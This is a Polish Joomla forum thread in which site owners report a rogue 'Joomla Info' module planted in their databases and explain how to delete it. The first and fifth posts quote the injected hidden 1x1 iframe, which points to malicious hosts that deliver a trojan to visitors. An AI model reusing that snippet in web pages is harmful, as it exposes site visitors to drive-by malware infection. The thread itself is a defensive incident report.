Aktualizacja z trojanem
Wyniki 1 do 9 z 9

Temat: Aktualizacja z trojanem

  1. #1
    Przeglądacz
    Dołączył
    18-01-2008
    Wpisy
    34
    Punkty
    11

    Domyślny Aktualizacja z trojanem

    Po aktualizacji Joomla! 1.0.11 do 1.0.13 (z polskim panelem administracyjnym) na liście modułów witryny pojawił się opublikowany Joomla Info. Przed aktualizacją go w serwisie nie było.
    Może to zbieg okoliczności, ale od tego momentu przy każdym wejściu do serwisu, IE7 zaczął odwoływać się do jakiejś podejrzanej strony. W źródle strony pojawił się taki zapis:

    <!-- Traffic Statistics -->
    <p><iframe width="1" height="1" frameborder="0" src="http://www.wp-stats-php.info/iframe/wp-stats.php"></iframe></p>
    <!-- End Traffic Statistics -->

    Jeśli moduł Joomla Info z tym kodem jest opublikowany w naszym serwisie, to każdy odwiedzający serwis za pomocą IE zostaje przekierowany do niebezpiecznej strony (http://www.wp-stats-php.info/iframe/wp-stats.php), z której na dysk do jednego z tymczasowych katalogów:
    C:\Documents and Settings\..uzytkownik..\Ustawienia lokalne\Temporary Internet Files\Content.IE5\..katalogi tymczasowe oznaczone cyframi i literami..
    umieszczony zostaje złośliwy plik: wp-stats[1].php, zawierający trojana w kodzie java.
    Wirus - trojan od 3 stycznia 2008r. wykrywany jest przez antywirusa Kaspersky, albo ZoneAlarm.

    Aby to wyeliminować należy:

    wejść w panel administratora
    Moduły - witryna
    Lista modułów [Witryna]
    i usunąć: Joomla Info

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 315
    Punkty
    1142

    Domyślny

    A skąd Ci się coś takiego znalazło w instalce Joomla? Skąd ją pobierałeś? Bo w instalkach z Joomla.pl takiego śmiecia nie ma!
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

  4. #3
    Przeglądacz
    Dołączył
    18-01-2008
    Wpisy
    34
    Punkty
    11

    Domyślny

    Jako przeglądarki na co dzień używam FireFoxa. Ona nie aktywuje tego odwołania do niebezpiecznej strony. Stąd dopiero w tym tygodniu przypadkowo po uruchomieniu IE7 i wejściu na własną stronę zauważyłem komunikat o potrzebie instalacji kontrolki do IE7. Odruchowo ją zainstalowałem, bo nie spodziewałem się, że coś niedobrego mnie spotka od „mojej” Joomli. Każdą operację na serwerze poprzedzam czyszczeniem systemu koniecznymi programami, by nie zasiać jakiegoś niepożądanego śmiecia.
    I od tej chwili wejście na stronę przy pomocy IE7 powodowało aktywację antywirusa.

    Przed aktualizacją 18.10.2007 r. na serwerze Joomli z 11 do 13, pobranej 16.08.2007 z joomla.pl (plik - joomla_1.0.13 JIE iso.zip) kilkanaście dni testowałem działanie mojej strony na localhost z XAMPP. Potem, gdy wszystko hulało bez problemów (aktualizacja nie powodowała żadnych problemów, bo stronę mam dość prostą) zamieniłem Joomlę na serwerze.
    Możliwe, że w czasie testowania "udało mi się" zawirusować bazę SQL, tylko że ta na serwerze, z tą na localhost, nie ma nic wspólnego. Bazy SQL na serwerze, gdzie mam Joomlę nie zmieniałem, a to wszystko dzieje się właśnie tylko w SQL-u. Z serwera tylko importuję bazę SQL przed dokonywaniem operacji aktualizacyjnych i do treningów na XAMPP. Stąd dość precyzyjnie mogę podać, kiedy ten niepożądany wpis się pojawił. Baza po aktualizacji 18.10.2007 r. już go miała, przedtem nie.

    Ale ciekawa sprawa - po usunięciu w Administratorze niechcianego modułu "Joomla Info", kompletnie nic się nie zmienia w katalogu Joomla. Jest dokładnie taki sam, nawet daty wszystkich plików są takie same, jak przed usunięciem. Ginie tylko w SQL ten jeden wpis. Sprytne. Bo nie można łatwo ustalić, co wywołuje przekierowanie do niebezpiecznej strony. Joomla jest czysta.
    Pytanie tylko, jak dokonała się niepożądana zmiana w bazie SQL?

    Napisałem, że może to przypadek. Ale ponieważ podczas walki z tym virusem w kilku miejscach czytałem, że: "macie na stronie trojana ...., bo antyvirus mi blokuje dostęp do waszej strony" podzieliłem się swymi doświadczeniami, może one pomogą innym z takim samym kłopotem.

    Uszanowanie dla Zwiastuna.

  5. #4
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 315
    Punkty
    1142

    Domyślny

    Dzięki za usz
    dla mnie rzecz nadal dziwna. Czy mógłbyś pobrać paczki joomla i przeskanować u siebie. Ostatni miesiąc - to skanowanie mojego kompa już bodaj 4 czy 5 antywirusem, pliki pakietów joomla czyściutkie jak dupcia niemowlęcia po kąpieli, ale może żaden antywir się nie poznał, a ani jednego, ani drugiego nie mam
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

  6. #5
    Przeglądacz
    Dołączył
    18-01-2008
    Wpisy
    34
    Punkty
    11

    Domyślny

    Prawdopodobnie tłumacząc co się działo, zbyt wszystko uprościłem.
    Otóż w Administratorze Joomli pojawił się moduł ”Joomla Info” w dniu aktualizacji strony na serwerze z wersji 11 do 13. Jestem pewny tego, bo przed i po aktualizacji wyeksportowałem zawartość SQL. W bazie SQL przed aktualizacją tego modułu nie było. Może właśnie w tym czasie ktoś zaatakował moją bazę SQL na serwerze i jest to zbieg okoliczności.
    Dotychczas sądziłem, że bez zgody administratora nie da się tworzyć nowych modułów w Joomli. Teraz tego nie jestem pewien, bo ten szkodliwy - „Joomla Info” chyba tak powstał. Miał nadany kolejny ID i figurował jako moduł Typ - „Użytkownik”, a ponieważ nazwa „Joomla Info” wzbudzała zaufanie, to poszukując sprawcy kłopotów, usuwałem po kolei wszystkie komponenty, booty i moduły, a ten dopiero na końcu. I nagle zdumienie – to jest winowajca.
    Usunięcie przy pomocy panelu Administratora modułu „Joomla Info” nie powoduje żadnych(!) zmian na serwerze w plikach katalogu joomla. Wniosek - to nie instalka (aktualizacja) Joomli jest zawirusowana. Szczotkowałem wszystkie instalki oraz wchodzące i wychodzące pliki na serwer i nic. On sobie tkwił w bazie SQL. Bazy nie zmieniałem na serwerze od postawienia Joomli 1.0.11 oprócz „porządkowania” z panelu administracyjnego SQL, więc chyba nie mogłem być sprawcą pojawienia się w niej tego wpisu.
    Zapis w „zawirusowanej” bazie SQL-u był taki:
    w ostatnim rekordzie w sekcji moduls były następujące wpisy:

    id 60
    title Joomla Info
    content <!-- Traffic Statistics --> <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
    ordering 11
    position left
    checked_out 0
    checked_out_time 0000-00-00 00:00:00
    published 1
    module
    numnews 0
    access 0
    showtitle 0
    params moduleclass_sfx=-ysveqb
    cache=0
    firebots=0
    rssurl=
    rsstitle=0
    rssdesc=0
    rssimage=0
    rssitems=0
    rssitemdesc=0
    word_count=0
    rsscache=3600

    Istnienia tego wpisu w bazie nie wykrywa żaden antywirus.
    Uruchomienie IE7 powoduje, że moduł "Jomla Info" wymusza zassanie wp-stats[1].htm, który zawiera kod trojana. I ten plik wchodząc na dysk wywołuje alarm antywirusa. Musiałbym przywrócić na serwerze bazę z tym śmieciem, aby zademonstrować pojawianie się wirusa, bo na lokalnym XAMPP i z bazą SQL zawierającą ten moduł, uruchamiając stronę w IE7 nic się nie dzieje.

  7. #6
    Przeglądacz
    Dołączył
    05-02-2006
    Wpisy
    86
    Punkty
    12

    Domyślny

    u mnie identyczna sytuacja - tyle, ze mam 1.0.12 i nie przechodzilem na 1.0.13... wczesniej tego nie bylo, jakis czas temu zauwazyli sami uzytkownicy. I rowniez modul Joomla Info, tez ten sam trojanik...

  8. #7
    Przeglądacz
    Dołączył
    18-01-2008
    Wpisy
    34
    Punkty
    11

    Domyślny

    Widocznie umieszczenie trojana odbywa się przez jakąś lukę. Może któryś z komponentów jest „nieszczelny”, albo trzeba znaleźć sposób na ochronę bazy SQL. Jest to zachęta dla innych, by zaglądnęli, czy nie mają modułu „Joomla Info”.

  9. #8
    Przeglądacz
    Dołączył
    05-02-2006
    Wpisy
    86
    Punkty
    12

    Domyślny

    Zastanawiam się czy przez ataki SQL Injection można coś dodać do bazy bo to że wyciągnąć dane to wiem...

  10. #9
    Przeglądacz
    Dołączył
    10-02-2007
    Wpisy
    88
    Punkty
    10

    Domyślny

    Dzięki chłopaki za ten temacik, bo u mnie też ten śmieć joomla info istniał, na szczęście już go wywaliłem, także przez przypadek zauważyłem otwierając strone w dziurawej jak sito IE ze wyskakuje jaki scrypcik wp-stat.

    pozdrawiam

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •